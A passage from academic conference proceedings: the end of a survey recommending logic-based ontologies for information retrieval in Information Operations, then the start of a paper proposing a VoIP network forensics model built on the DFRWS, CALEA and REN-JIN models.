adopting this technology is its status as an emerging technology and therefore we include recommendations for<br />
the development of a prototype system.<br />
Keywords: information operations, knowledge representation, ontology, query language<br />
1. Introduction<br />
Businesses, governments, and military forces are increasingly reliant on the effective management of<br />
vast sources of electronic information. The type of information can be documents, images, maps, or<br />
other formats. These data sources can be used in Information Operations (IO).<br />
McCrohan (McCrohan 1998) defines IO as “actions taken to create an information gap in which we<br />
possess a superior understanding of a potential adversary’s political, economic, military, and<br />
social/cultural strengths, vulnerabilities, and interdependencies than our adversary possesses of us”.<br />
All institutions that rely on information are facing increasing exposure to strategic information-based<br />
actions, and need to consider systems security. Most national defence and security organisations<br />
regard IO as both a defensive and an offensive tool, and some commercial institutions are starting to<br />
recognise the value of IO. In any competitive environment, an institution has to protect their strategies<br />
from competitors and gather information regarding their competitors’ objectives and plans. IO include<br />
competitive intelligence, security against the efforts of competitors, the use of competitive deception,<br />
and the use of psychological operations. (McCrohan 1998).<br />
The aim of an efficient information retrieval system is to support institutions in planning IO. Information<br />
has to be presented for processing by computers in a knowledge system such that information can be<br />
retrieved and conclusions can be drawn from existing knowledge. Information should be classified in a<br />
way that it can be searched and extracted effectively.<br />
We present the main decisions required in the investigation and design of a knowledge system that<br />
can be used to extract relevant and complete knowledge for the planning and execution of IO and<br />
give a motivation for our main recommendation: the use of logic-based ontologies in a knowledge<br />
system for IO.<br />
151
Louise Leenen et al.<br />
2. Intelligent knowledge retrieval methods and technologies<br />
We describe appropriate technologies for intelligent search and retrieval of information over a range<br />
of different sources and types. The operative word here is intelligent, focussing on methods that will<br />
ensure maximum recall with a high level of fidelity. In other words, the aim is to get as close as is<br />
currently feasible to the ideal situation in which all and only relevant information will be returned. In<br />
order to do so, it is necessary to be more precise in deciding what it means for information to be<br />
relevant. The most important step in this direction is the distinction between syntactic and semantic<br />
relevance.<br />
Syntactic relevance refers to search based on the syntactic structure of the entities to be searched,<br />
while semantic relevance is concerned with the underlying meaning of the syntactic objects being<br />
represented. Search based on syntactic relevance can be better or worse depending on some<br />
flexibility built into the search mechanisms, but this provides only for a very limited and restricted form<br />
of intelligence. To be seen as performing intelligent search in any true sense of the word, it is<br />
necessary to make use of some version of semantic relevance.<br />
The basic assumption is that information can be accessed electronically. Information in this sense is<br />
defined very broadly: it can refer to data entries stored in database systems, or in more sophisticated<br />
structures. It can also refer to electronic documents, or an image in any of the known formats, or any<br />
one of the other numerous resources that can be stored electronically. The main reason why it is<br />
possible to allow for such a broad definition is that the methods detailed in this survey allow for a<br />
clean separation between information, the structures employed to store the information, and the<br />
methods used to access the information.<br />
2.1 Query languages<br />
2.1.1 Boolean combinations of keywords<br />
Keyword search is an established technology (Kalyanpur et al. 2006). The simplest form is when a list<br />
of keywords is used with the intention to locate information containing all keywords in the list. More<br />
flexible keyword searches can be done by using Boolean operators such as AND, OR and NOT. This<br />
kind of query language can not be used in database-style structures. A second difficulty is that<br />
searches become complex when there are large numbers of keyword hits.<br />
2.1.2 Logic-based query languages<br />
The use of logic-based languages is pervasive in database systems. It has its origins in languages<br />
such as SQL and later extensions such as the query languages for Datalog (Ceri et al. 1989) and<br />
logic programming (Lloyd 1987). These languages are all fragments of first-order logic (Ben-Ari 2008).<br />
In addition to the Boolean operators discussed in the previous section, these query languages also<br />
allow for the use of variables, existential quantification (exists), universal quantification (for all), and<br />
function symbols, and combinations of these additions in manner reminiscent of the recursive<br />
definition in the previous section. This allows us to express complex queries such as:<br />
“Find all countries in Africa with a per capita income of at most $X, and with a military<br />
style government, or where there is no adherence to human rights”.<br />
The main advantages of these types of query languages are that they allow for much more complex<br />
queries, can be used to express queries about concepts as well as individuals, and are applicable to<br />
information contained in database-style structures as well as electronic documents. However, the<br />
processing of such queries can be very complex, and is directly related to the complexity of queries. It<br />
is good practice to limit the expressivity of a chosen query language to precisely what is necessary in<br />
order to maximise the efficiency of query processing.<br />
2.2 Information types<br />
It is useful to assume that information is tagged with the relevant components to be matched with<br />
queries. This assumption enables us to reduce the original question to a decision of how a piece of<br />
information should be tagged. A tag is a keyword associated with a piece of information. The purpose<br />
of a tag is to describe an item and to enable an electronic search to find it .<br />
152
Louise Leenen et al.<br />
We distinction between using text or keywords as tags, and between information contained in<br />
database-style structures and electronic documents viewed as information.<br />
2.2.1 Text as tags<br />
In the case of information contained in database-style structures, the only practical option is to view<br />
the information itself as its own tag. In the case of electronic documents, the simplest form of tagging<br />
is the brute force approach of using the raw text contained in a document. In a sense the document is<br />
tagged with all of its textual content. The advantage of such an approach is that it is relatively simple<br />
to implement, but this simplicity is associated with high levels of inaccuracy. In particular, this<br />
approach is bound to lead to many false positives and it does not guarantee that all relevant<br />
documents will be located. The main problem is that this is a purely syntactic approach. There is no<br />
attempt to tag documents with keywords related to the meaning of the document, and there is<br />
therefore no guarantee that the tags will be truly relevant to the content of the document.<br />
2.2.2 Keywords as tags<br />
In contrast with using text as tags, the practice of tagging information with appropriate keywords<br />
allows for a much more flexible approach. The goal is to tag documents with keywords that are clearly<br />
relevant to the meaning of the document, ideally to tag documents with all and only the relevant<br />
keywords. The primary issue to be resolved here is to how to decide on the relevant keywords.<br />
Tagging can take one of three forms: Manual tagging, semi-automated tagging, or automated tagging<br />
(Buitelaar, Cimiano 2008; Buitelaar, Magnini 2005). Current techniques are relatively good at picking<br />
out keywords related to concepts and individuals, but much work still needs to be done regarding<br />
keywords related to relationships between concepts or individuals.<br />
Manual tagging is a good starting point however, using only manual tagging is usually not feasible,<br />
due to factors such as time constraints and the availability of domain experts. A better approach is to<br />
interleave processes for manual, semi-automated and automated tagging of documents. Automated<br />
tagging is faster but not as accurate, whereas semi-automated tagging provides better results, but is<br />
more time consuming to set up. Keep in mind that the results obtained even from manual tagging are<br />
only as good as the knowledge applied by the person(s) performing the tagging.<br />
The good news is that tagging method lends itself to an incremental approach. One can start with a<br />
fairly course-grained tagging methodology, and refine this increasingly over time.<br />
2.3 Information retrieval methods<br />
2.3.1 Direct retrieval<br />
Direct retrieval is concerned with methods for extracting information stored explicitly in as efficient a<br />
manner as possible. This is the kind of retrieval based on indexing techniques that one would obtain<br />
from traditional database systems and from keyword searches based on syntactic relevance (Gray,<br />
Reuter 1992; Kroenke 1997). In the case of direct document retrieval, keywords in a query are<br />
identified and are matched directly with the keywords used to tag the document.<br />
Direct retrieval techniques are firmly established, and are able to deal efficiently with huge amounts of<br />
information. The only drawback is the restriction on the type of information to be extracted: it has to be<br />
stored explicitly in some form.<br />
2.3.2 Indirect retrieval<br />
A more sophisticated approach is to employ some kind of indirect retrieval where the task is to match<br />
the keywords identified in the query not just with the exact keywords with which a document is tagged,<br />
but also with related keywords. The hard part is to determine what constitutes being related. Standard<br />
approaches to indirect document retrieval are mostly still syntax-based:<br />
The use of synonyms using resources such as WordNet (http://wordnet.princeton.edu/)<br />
(Fellbaum 1998).<br />
153
Louise Leenen et al.<br />
Lemmatisation, the process of grouping together the different inflected forms of a word so they<br />
can be analysed as a single item (Brown 1993). For example, the verb “to walk” may appear as<br />
“walk”, “walked”, “walks”, “walking”. The base form, “walk”, is called the lemma of the word.<br />
Stemming, which is closely related to lemmatisation but operates on a single word without<br />
contextual information. Related words should map to the same stem, but the stem does not have<br />
to be a valid root.<br />
A more nuanced version of indirect document retrieval involves structures able to capture and<br />
represent sophisticated relationships between entities. The more sophisticated version of indirect<br />
retrieval employs methods for performing inference of some kind. Indirect retrieval also includes<br />
information that can be inferred implicitly from what is stored explicitly.<br />
The most appropriate technology able to deal with indirect information retrieval is that based on<br />
ontologies (Staab, Studer 2004). The following definition of an ontology is taken from Wikipedia<br />
(http://en.wikipedia.org/wiki/Ontology_(information_science)): “an ontology is a formal representation<br />
of a set of concepts within a domain and the relationships between those concepts. It is used to<br />
reason about the properties of that domain, and may be used to define the domain”.<br />
In addition to facilitating the hierarchical structuring of information from a domain of discourse,<br />
ontologies also provide the means to impose a whole variety of other constraints, which makes it a<br />
very powerful method for representing concepts, individuals, and the relationships between them. The<br />
use of logic-based ontologies is particularly apt, since it provides the means for employing powerful<br />
and efficient mechanisms for performing inference.<br />
2.4 Ontologies and ontology-based engineering<br />
In the past fifteen years, advances in technology have ensured that access to vast amounts of data is<br />
no longer a significant problem. Paradoxically, this abundance of data has lead to a problem of<br />
information overload, making it increasingly difficult to locate relevant information. The technology of<br />
choice at present is keyword search, although many argue that this is already delivering diminishing<br />
returns, as Figure 1 below by Nova Spivack (Spivack 2007) indicates. Spivack illustrates how keyword<br />
search is becoming less effective as the Web increases in size. The broken line shows that the<br />
productivity of keyword search has reached a plateau and its efficiency will decrease in future, while<br />
the dotted line plots the expected growth of the Web.<br />
Any satisfactory solution to this problem will have to involve ways of making information machineprocessable,<br />
a task which is only possible if machines have better access to the semantics of the<br />
information. It is here that ontologies play a crucial role. Roughly speaking, an ontology structures<br />
information in ways that are appropriate for a specific application domain, and in doing so, provides a<br />
way to attach meaning to the terms and relations used in describing the domain. A more formal, and<br />
widely used definition, is that of Grüber (Grüber 1993) who defines an ontology as a formal<br />
specification of a conceptualisation.<br />
The importance of this technology is evidenced by the growing use of ontologies in a variety of<br />
application areas, and is in line with the view of ontologies as the emerging technology driving the<br />
Semantic Web initiative (Berners-Lee et al. 2001). The construction and maintenance of ontologies<br />
greatly depend on the availability of ontology languages equipped with a well-defined semantics and<br />
powerful reasoning tools. Fortunately there already exists a class of logics, called Description Logics<br />
(DLs), that provide for both, and are therefore ideal candidates for ontology languages (Baader et al.<br />
2003).<br />
The need for sophisticated ontology languages was already clear fifteen years ago, but at that time,<br />
there was a fundamental mismatch between the expressive power and the efficiency of reasoning that<br />
DL systems provided, and the expressivity and the large knowledge bases that ontologists needed.<br />
Through the basic research in DLs of the last fifteen years, this gap between the needs of ontologists<br />
and the systems that DL researchers provide has finally become narrow enough to build stable<br />
bridges. In fact, the web ontology language OWL 2.0, which was accorded the status of a World Wide<br />
Web Consortium (W3C) recommendation in 2009, and is therefore the official Semantic Web ontology<br />
language, is based on an expressive DL (http://www.w3.org/TR/owl2-overview/).<br />
154
Louise Leenen et al.<br />
There is growing interest in the use of ontologies and related semantic technologies in a wide variety<br />
of application domains. Arguably the most successful application area in this regard is the biomedical<br />
field (Hahn, Schulz 2007; Wolstencroft et al. 2005 ). Some of the biggest breakthroughs can be traced<br />
back to the pioneering work of Horrocks (Horrocks 1997) who developed algorithms specifically<br />
tailored for medical applications. Recent advances have made it possible to perform standard<br />
reasoning tasks on large-scale medical ontologies such as SNOMED CT - an ontology with more than<br />
300 000 concepts and more than a million semantic relationships - in less than half an hour; a feat<br />
that would have provoked disbelief ten years ago (Suntisrivaraporn et al. 2007). However, a number<br />
of obstacles still remain before the use of ontologies can be regarded as having reached the status of<br />
an established technology: mainly these are issues relating to conceptual modeling and data usage.<br />
Figure 1: Productivity of keyword search<br />
2.4.1 Conceptual modeling<br />
There are currently no firmly established conceptual modelling methodologies for ontology<br />
engineering. Although a variety of tools exist for ontology construction and maintenance (Kalyanpur et<br />
al. 2006; Sirin et al. 2007; Protégé 2009) they remain accessible mainly to those with specialised<br />
knowledge about the theory of ontologies. One way of dealing with this problem is to design ontology<br />
languages that are as close to natural language as possible, while still retaining the unambiguous<br />
semantics of a formal language (Schwitter et al. 2007). A related approach is to use unstructured text<br />
to automatically identify concepts and relationships in application domains, and in doing so contribute<br />
to the semi-automated construction of ontologies (Buitelaar, Cimiano 2008).<br />
Another major obstacle is that, while most tools for ontology construction and maintenance assume a<br />
static ontology, the reality is that ontologies are dynamic entities, continually changing over time for a<br />
variety of reasons. This has long been identified as a problem, and ontology dynamics is currently<br />
seen as an important research topic (Baader et al. 2005; Lee et al. 2006).<br />
2.4.2 Data usage<br />
Assuming that the problems relating to conceptual modeling have been solved, and that it is possible<br />
to construct and maintain high-quality ontologies, a number of stumbling blocks related to data usage<br />
still remain.<br />
155
Louise Leenen et al.<br />
The main problem is that most available data are currently in the form of unstructured or semistructured<br />
text, or can be found in traditional relational database systems. The rich conceptual<br />
structures provided by ontologies are therefore of little use unless ways can be found to automate, or<br />
semi-automate, the process of populating ontologies with this data. Regarding data in textual form,<br />
there have been some recent attempts to perform semi-automated instantiation of ontologies from text<br />
(Buitelaar, Cimiano 2008; Williams, Hunter 2007). With regards to the data found in database<br />
systems, it is necessary to employ data coupling - finding ways of linking the data residing in<br />
database systems to the ontologies placed on top of such systems (Calvanese et al. 2006). This<br />
challenge is currently being met by tools for Ontology Based Data Access (OBDA) (Rodriguez-Muro<br />
et al. 2008).<br />
Once an ontology is populated, it becomes possible to use it as a sophisticated data repository to<br />
which complex queries can be posed, at least in principle. In practice, at least two challenges remain.<br />
The first is to perform query answering efficiently, a topic of ongoing research (Calvanese et al. 2007).<br />
The second is to go beyond purely deductive reasoning to answer queries and to be more proactive.<br />
A good example of this type of reasoning occurs during medical diagnosis, which is an instance of a<br />
form of reasoning technically known as abduction (Elsenbroich et al. 2007).<br />
2.5 Tools for user support<br />
There is a danger that the complexity of the techniques discussed above will pose a barrier to their<br />
general uptake. Most techniques incorporate some level of familiarity with technical issues such as<br />
formal logic languages, which can be disconcerting for the more casual user. We discuss two classes<br />
of methods used to bridge the gap between users and the technology.<br />
2.5.1 Controlled natural language<br />
A controlled natural language is a suitable fragment of a natural language, usually obtained by<br />
restricting the grammar and vocabulary. This is done primarily to ensure that there is no ambiguity in<br />
the interpretation. It can also assist with a reduction in complexity. Controlled natural languages can<br />
usually be mapped to existing formal languages, typically a fragment of first-order logic.<br />
For our purposes the translation will be to a suitable DL used to represent ontologies. Because of this<br />
mapping, controlled natural languages have a formal semantics, making them suitable as knowledge<br />
representation languages, able to support inference tasks such as query answering. The advantage<br />
of using controlled natural languages instead of their logic counterparts is that it appears to the user<br />
as if a natural language is being used. Work on controlled natural language most relevant for logicbased<br />
ontologies include Manchester OWL Syntax (Horrocks et al. 2006), Sydney OWL Syntax (SOS)<br />
(Rodriguez-Muro et al. 2008 ), and the Rabbit language (Hart et al. 2008 ).<br />
2.5.2 Contextual navigation<br />
This subsection is concerned with the principles of the design and development of an intelligent query<br />
interface (Catarci et al. 2004). The interface is intended to support users in formulating queries which<br />
best capture their specific information needs. The distinctive part of this approach is the use of an<br />
ontology as the support for the intelligence contained in the query interface. The user can exploit the<br />
vocabulary in the ontology to formulate the query. Using the information contained in the ontology, the<br />
system is able to guide the user to express their intended query more precisely. Queries can be<br />
specified through an iterative refinement process supported by the ontology through contextual<br />
navigation. In addition, users may discover new information about the domain without explicit<br />
querying, but through the subparts of a query, using classification. Work on contextual navigation is<br />
not restricted to logic-based ontology languages, but it does depend on an underlying knowledge<br />
representation language with an associated formal reasoner. In the context of ontologies, it has led to<br />
the development of a query tool as part of the <strong>European</strong> Union funded SEWASIE project (SEmantic<br />
Webs and AgentS in Integrated Economies) (http://www.sewasie.org/).<br />
3. Research methodology<br />
We first conducted a needs analysis with our client with the aim of identifying their expectations and<br />
requirements, followed by a problem analysis where the client’s domain was studied and<br />
recommendations in terms of the most appropriate technologies for their applications were made.<br />
156
3.1 Needs analysis<br />
Louise Leenen et al.<br />
Needs analysis is an interactive process with the aim of extracting information from the client to<br />
understand their needs and expectations. It involves asking specific questions to the client and<br />
recording and documenting their responses. Usually several interactions are required before this<br />
process is completed.<br />
The type of questions that were posed to our client can broadly be defined as:<br />
What is the reality of your domain?<br />
What do you do?<br />
What are the challenges you experience?<br />
What are your expectations from an information operation?<br />
The aim of these questions is to identify the type of IO the client wants to execute, the range of<br />
required information sources and how information should be interpreted. It should also point to the<br />
type of information repositories that will be needed, and how they should be populated and updated.<br />
As a result we compiled an extensive set of derived questions. These questions depict the scope of<br />
information required by our client for an operation.<br />
3.2 Problem analysis<br />
In this phase we analysed the various methodologies and technologies available for an appropriate<br />
knowledge representation system for the client’s domain. A basic assumption is that all information<br />
can be accessed electronically and includes documents, images or maps, and data stored in<br />
database systems, or in more sophisticated structures.<br />
The following three primary questions were applied to the client’s domain:<br />
In which way will a user extract information, i.e. which query language is to be used?<br />
How will the type of information to be extracted be matched with the query?<br />
Which method will be used to retrieve the information contained in the query from the information<br />
repository?<br />
A formal problem statement was written that includes strategic long term direction and objectives.<br />
3.3 Findings<br />
The main recommendation is that a logic-based ontology is to be used as the underlying technology<br />
for the retrieval system. The adoption of logic-based ontologies as underlying formalism for a<br />
knowledge representation system has a number of advantages.<br />
The semantics of such an ontology is<br />
unambiguous;<br />
it facilitates intelligent search;<br />
it provides an optimal tradeoff between expressivity and complexity; and<br />
it can yield optimal recall of information.<br />
The risk of adopting this technology is its status as an emerging technology. Its impressive progress in<br />
the biomedical domain lends strong support for its adoption in the IO domain, but there are presently<br />
no off-the-shelf ontologies available for IO.<br />
The development of such an ontology that is both reliable and complete is a highly complex research<br />
endeavour. With this in mind, we recommend an incremental approach to the adoption of this<br />
technology in order to realise the long term strategic objectives outlined earlier.<br />
The developmental recommendations for a prototype system are:<br />
Define a suitable sub-domain for initial development. Our client’s domain is vast and complex.<br />
The recommendation is to start with a smaller, focused domain.<br />
157
Louise Leenen et al.<br />
The documents in the domain should be tagged. The choice of tags will depend on the ontology<br />
and the concepts used in existing information sources.<br />
An ontology-based search facility should be developed.<br />
An appropriate query language should be decided on in conjunction with a suitable user interface.<br />
which may involve controlled natural language or contextual navigation, or both.<br />
The evaluation of a prototype system will determine the extension of the system into a comprehensive<br />
knowledge system.<br />
4. Conclusion<br />
In this paper we have focused on the technologies relevant for intelligent information retrieval for<br />
Information Operations. Conceptually, the survey is decomposed into three parts:<br />
Choices for a suitable query language;<br />
Type of information to be extracted;<br />
Methods employed for information retrieval.<br />
Supplementary to this is a discussion on ontologies, as well as on tools for supporting users of<br />
systems for intelligent retrieval.<br />
Our main conclusion is that the use of logic-based ontologies has the potential to be of enormous<br />
benefit in systems demanding true intelligent retrieval. However, it has to be taken into account that<br />
this is an emerging technology that will still require a substantial amount of research in order to reach<br />
maturity. The good news is that it is possible to approach matters in an incremental fashion,<br />
developing an information repository based on more traditional methods, and gradually increasing its<br />
sophistication.<br />
References<br />
The Protégé Ontology Editor. Available: http://protege.stanford.edu/. [2009, January].<br />
Baader, F., Calvanese, D., McGuinness, D., Nardi, D. & Patel-Schneider, P. (2003) The Description Logic<br />
Handbook: Theory,Implementation, and Applications, Cambridge University Press.<br />
Baader, F., Lutz, C., Milicic, M., Sattler, U. & Wolter, F. (2005) "Integrating Description Logics and Action<br />
Formalisms: First results", AAAI 05.<br />
Ben-Ari, M. (2008) MathematicalLlogic for Computer Science, Springer.<br />
Berners-Lee, T., Hendler, J. & Lassila, O. (2001), "The semantic web", Scientific American, Vol. 284, No. 5.<br />
Brown, L. (1993) The New Shorter Oxford English Dictionary on Historical Principals, Vol 1, Oxford University<br />
Press.<br />
Buitelaar, P. & Cimiano, P. (2008) "Ontology Learning and Population: Bridging the Gap Between Text and<br />
Knowledge", Frontiers in Artificial Intelligence and Applications, Vol. 167.<br />
Buitelaar, P. & Magnini, B. (2005) "Ontology Learning From Text: Methods, Evaluation and Applications",<br />
Frontiers in Artificial Intelligence and Applications, Vol. 123.<br />
Calvanese, D., De Giacomo, G., Lembo, D., Lenzerini, M., Poggi, A. & Rosati, R. (2006) "Linking Data to<br />
Ontologies: The Description Logic DL-LiteA.", The 2 nd workshop on OWL.<br />
Calvanese, D., Giacomo, G.D., Lembo, D., Lenzerini, M. & Rosati, R. (2007) "Tractable Reasoning and Efficient<br />
Query Answering in Description Logics: The DL-Lite Family.", Journal of Automated Reasoning, Vol. 39, No.<br />
3.<br />
Catarci, T., Dongilli, P., Mascio, T.D., Franconi, E., Santucci, G. & Tessaris, S. (2004) "An Ontology Based Visual<br />
Tool for Query Formulation Support", ECAI 2004.<br />
Ceri, S., Gottlob, G. & Tanca, L. (1989) "What you always wanted to know about Datalog (and never dared to<br />
ask.)", IEEE Transactions on Knowledge and Data Engineering, Vol. 1, No. 1.<br />
Elsenbroich C., Kutz O. & Sattler, U. (2007) "A Case for Abductive Reasoning over Ontologies", OWLED.<br />
Fellbaum, C. (1998) WordNet: An Electroni Lexical Database, MIT Press.<br />
Gray, J. & Reuter, A. (1992), Transaction Processing: Concepts and Techniques, Morgan Kaufmann Publishers.<br />
Grüber, T. (1993) "A translation approach to portable ontology specifications", Knowledge Acquisition, Vol. 5.<br />
Hahn, U. & Schulz, S. (2007) "Ontological foundations for biomedical sciences", Artificial Intelligence in Medicine,<br />
Vol. 39, No. 3.<br />
Hart, G., Dolbear, C. & Johnson, M. (2008) "Rabbit: Developing a Control Natural Language for Authoring<br />
Ontologies", 5th <strong>European</strong> Semantic Web <strong>Conference</strong>.<br />
Horrocks, I. (1997) Optimising Tableaux Decision Procedures for Description Logics, University of Manchester.<br />
Horrocks, M., Drummend, N., Goodwin, J., Rector, A., Stevens, R. & Wand, H. (2006) "The Manchester OWL<br />
Syntax", OWL Experiences and Directions Workshop.<br />
Kalyanpur, A., Parsia, B., Sirin, E., Cuenca-Grau, B. & Hendle, J. (2006) "Swoop: A Web Ontology Editing<br />
Browser", Journal of Web Semantics, Vol. 4, No. 2).<br />
158
Louise Leenen et al.<br />
Kroenke, D.M. (1997) Database Processing: Fundamentals, Design, and Implementation, Prentice-Hall.<br />
Lee, K., Meyer, T., Pan, J.Z. & Booth, R. (2006) "Finding Maximally Satisfiable Terminologies for the Description<br />
Logic ALC", Proceedings of AAAI 06.<br />
Lloyd, J.W. (1987) Foundations of logic programming, Springer-Verlag, New York.<br />
McCrohan, K.F. (1998) "Competitive Intelligence: Preparing for the Information War", Long Range Planning, Vol.<br />
31, No. 4.<br />
Rodriguez-Muro, M., Lubyte, L. & Calvanese, D. (2008) "Realizing Ontology Based Data Access: A plug-in for<br />
protoge", ICDE Workshops.<br />
Schwitter, R., Cregan, A. & Meyer, T. (2007) "Sydney OWL Syntax - towards a Controlled Natural Language<br />
Syntax for OWL 1.1.", OWL Experiences and Directions, Third International Workshop.<br />
Sirin, E., Parsia, B., Grau, B.C., Kalyanpur, A. & Katz, Y. (2007) "Pelet: A practical OWL-DL reasoner", Journal of<br />
Web Semantics, Vol. 5, No. 2.<br />
Spivack, N. (2007). Available:<br />
http://novaspivack.typepad.com/nova_spivacks_weblog/2007/03/beyond_keyword_.html. [2010, November<br />
2010]<br />
Staab, S. & Studer, R. (eds) (2004) Handbook on Ontologies, Springer.<br />
Suntisrivaraporn, B., Baader, F., Schulz, S. & Spackman, K. (2007) "Replacing SEP-Triplets in SNOMED CT<br />
using Tractable Description Logic Operators", AIME.<br />
Williams, M. & Hunter, A. (2007) "Harnessing ontologies for argument-based decision-making in breast cancer",<br />
International <strong>Conference</strong> for Tools with Artificial Intelligence.<br />
Wolstencroft, K., Brass, A., Horrocks, I., Lord, P., Sattler, U., Stevens, R. & Turi, D. (2005) "A little semantic web<br />
goes a long way in biology", International Semantic Web <strong>Conference</strong>.<br />
159
CAESMA – An On-Going Proposal of a Network Forensic<br />
Model for VoIP traffic<br />
Jose Mas y Rubi, Christian Del Carpio, Javier Espinoza, and Oscar Nuñez Mori<br />
Pontificia Universidad Catolica del Peru, Lima, Peru<br />
jlmasyrubi@pucp.edu.pe<br />
delcarpio.christian@pucp.edu.pe<br />
jmespino@pucp.edu.pe<br />
oscar.nunez@pucp.pe<br />
Abstract: In the near future, service convergence will be a reality, which presents us with a possible misuse<br />
problem of these technologies. One of these services is Voice over IP (VoIP), which provides the phone<br />
communication services in this scheme. Currently VoIP is a very popular technology, and could be use by<br />
malicious attackers related to informatics crimes, to perform their illicit actions, which will be difficult to track<br />
because of IP network’s nature. Because of this, our approach is to achieve a preliminary analysis to create a<br />
forensic model for detection and tracing of VoIP traffic, which will allow us to make an adequate evidence<br />
recollection which could be used by the police authorities.<br />
Keywords: network forensics, forensic model proposal, voice over IP<br />
1. Introduction<br />
Due to the inadequate use of the telephone service in converged networks, mainly generated by<br />
malicious attackers who misuse this technology, it becomes necessary to identify the security gaps in<br />
this network and provide a possible solution.<br />
Therefore, previous to the development of this article we analyze the security gaps (Annex 1), and<br />
based on that analysis we perceive like a potential security problem “the user identification for the<br />
calls originated from internet (VoIP)”, due to the lack of user data validation at the registration process<br />
when the named source is use it.<br />
This problem hinders the proper evidence recollection from the authorities, leading to the fact that<br />
many times this acts stay unpunished due to the lack of possible identification of the attackers.<br />
This document propose a preliminary data recollection model for a posterior forensic analysis in a<br />
VoIP network environment for calls generated from the Internet, based on the network architecture<br />
shown in Figure 1. For our analysis, we will rely on the Digital Forensics Research Workshop<br />
(DFRWS) model, which is a general model for a proper digital forensic analysis.<br />
Figure 1: Network architecture<br />
160
Jose Mas y Rubi et al.<br />
As we can see within the network architecture, the originating point of the calls for our analysis will be<br />
the Internet cloud, the establishment path and signaling is the following:<br />
a. Connection to the SIP server, which contains the database of all the users in the VoIP network.<br />
b. After the validation of the destination user, which is part of the VoIP network, the SIP server sends<br />
the corresponding signaling for call establishment with the VoIP network.<br />
The rest of the article is organized as follows: In section II we introduce all the information related to<br />
our work, which offers a clear base about the DFRWS general analysis model and the technology<br />
behind VoIP service. In section III we describe the CALEA and REN-JIN models, offering a theoretical<br />
basis and techniques that will allow us to understand in a better way the proposal of this work. In<br />
section IV we develop a comparative analysis between CALEA and REN-JIN models, taking into<br />
account the DFRWS general model as study base for both of them. In section V we propose a new<br />
forensic model which is the result of the previous analysis, and we study its preliminary architecture<br />
and basic operation. Finally we present our conclusions and possible future works.<br />
2. Theoretical basis<br />
To start our investigation, it is necessary that we study our referential general model for forensic<br />
analysis of the DFRWS and the technical concepts of the VoIP technology, in order to contextualize<br />
our analysis in a suitable environment.<br />
2.1 Digital Forensics Research Workshop (DFRWS) model<br />
Several forensic investigators have analyzed multiple digital forensic models. Within those models,<br />
they found that the DFRWS model is rigid and linear but is particularly suitable where necessary<br />
investigative activities are well-understood (Ray 2007). Also, they highlight the fact that in the<br />
development of this model, for the first time, academic entities were involved, which didn’t happen<br />
with other forensic models in its time. All other models were more focused on guidelines established<br />
by law enforcement (Reith 2002).<br />
Therefore, we choose the DFRWS model because allows a comprehensive approach and is more<br />
goal-oriented to the objectives of this academic article. To proceed, we show the step sequence<br />
followed by this model for an adequate forensic analysis:<br />
Table 1: Steps for a digital forensic analysis (DFRWS 2001)<br />
2.2 Voice over IP (VoIP)<br />
The important point to keep in mind about the VoIP technology is concerning the shared information<br />
between the terminal devices and the data itself, which will enable us to discriminate the calls and<br />
their types. Those elements are presented in the following list (Pelaez 2010):<br />
a) Terminal device information:<br />
161
Numbers called.<br />
Source and destination IP addresses.<br />
IP geographical localization.<br />
Incoming calls.<br />
Start/end times and duration.<br />
Voice mail access numbers.<br />
Call forwarding numbers.<br />
Incoming/outgoing messages.<br />
Access codes for voice mail systems.<br />
Contact lists.<br />
Jose Mas y Rubi et al.<br />
b) VoIP data:<br />
Protocol type.<br />
Configuration data.<br />
Raw packets.<br />
Inter-arrival times.<br />
Variance of inter-arrival times.<br />
Payload size.<br />
Port numbers.<br />
Codecs.<br />
The Session Initiation Protocol (SIP) is an important part of the VoIP network communication. SIP is<br />
an IETF standard for IP multimedia conferences. SIP is an application layer control protocol use to<br />
create, modify and terminate session with one or more participants. These sessions include internet<br />
multimedia conferences, internet phone calls and multimedia distribution. The signaling allows the<br />
transportation of call information across the network boundaries. The session management provides<br />
the ability to control the attributes of an end-to-end call (Fernandez 2007).<br />
3. Related works<br />
In our preliminary investigation, we searched different models that could adapt to the DFRWS general<br />
model, and among the most outstanding models we found REN-JIN and CALEA, which will be<br />
describes in the following subsections.<br />
3.1 CALEA model<br />
Government Surveillance is a network forensic special case. Communications Assistance for Law<br />
Enforcement Act (CALEA) is another term use for this electronic surveillance. This means that is<br />
legally valid to introduce an agent inside a communication channel to intercept information, without<br />
altering it (Scoggins 2004).<br />
The wiretapping installation is based on the wire modem’s MAC address, so it can be use for the data<br />
or digital voice connections. This characteristic is controlled by the command interface, intercepted<br />
cable, which requires a MAC address, an IP address and an UDP port number as their parameters<br />
(Scoggins 2004).<br />
When it is active, the router examines each packet with the desirable MAC addresses and when finds<br />
a match to one of those addresses (either from the origin or destination terminal device), a copy is<br />
send to the server, specifying the IP address and port number (Scoggins 2004).<br />
Figure 2 shows how the components of CALEA model (Delivery Function, Collection Function and<br />
Law Enforcement Agency) integrate with a VoIP system providing a transparent lawful interception.<br />
Calls are routed through an access gateway that hides any intercepts in place (Pelaez 2007).<br />
162
Figure 2: CALEA forensic model (Pelaez 2007)<br />
Jose Mas y Rubi et al.<br />
Telephone interception can be classified in two categories:<br />
Call detail: Send and receive call details from a subscriber, that will pass to LEA. The generated call<br />
registration created from signaling message can be very valuable in criminal investigations. The<br />
signaling message contains data from phone calls, not about the content of the conversation.<br />
Therefore, the recollection and analysis of signaling messages cannot be subject to the same legal<br />
restrictions as recording voice conversations (Moore 2005).<br />
Call content: It is the real content of the call that we pass to LEA. The suspect must not detect the<br />
mirror, so this element must be produced inside the network and not in the subscriber link. Also this<br />
mirror must not be detectable by any change in time, availability characteristics or operation (Pelaez<br />
2007).<br />
In order that LEA take advantage of the call content without the subscriber knowledge of any change,<br />
all the calls must pass through a device that duplicate the content and then pass it to the agency<br />
(Pelaez 2007).<br />
3.2 REN–JIN model<br />
This model, conceived by Wei Ren and Hai Jin, is designed to capture the network traffic and to<br />
register the corresponding data. This network forensic system has 4 elements (Pelaez 2006):<br />
Network Forensics Server, which integrates the forensic data and analyzes it. It also guides the<br />
network packet filter and captures the behavior of the Network Monitor. It can request the<br />
activation of an investigation program in the Network Investigator has an answer to a sensitive<br />
attack.<br />
Network Forensics Agents, is responsible of data recollection, data extraction and data secure<br />
transportation. These agents are distributed around the network and the monitored hosts.<br />
Network Monitor, is a packet and network traffic capture machine.<br />
Network Investigator, is the network surveillance machine. It investigates a target when the server<br />
gives the command. It activates a real time response program for each network intrusion.<br />
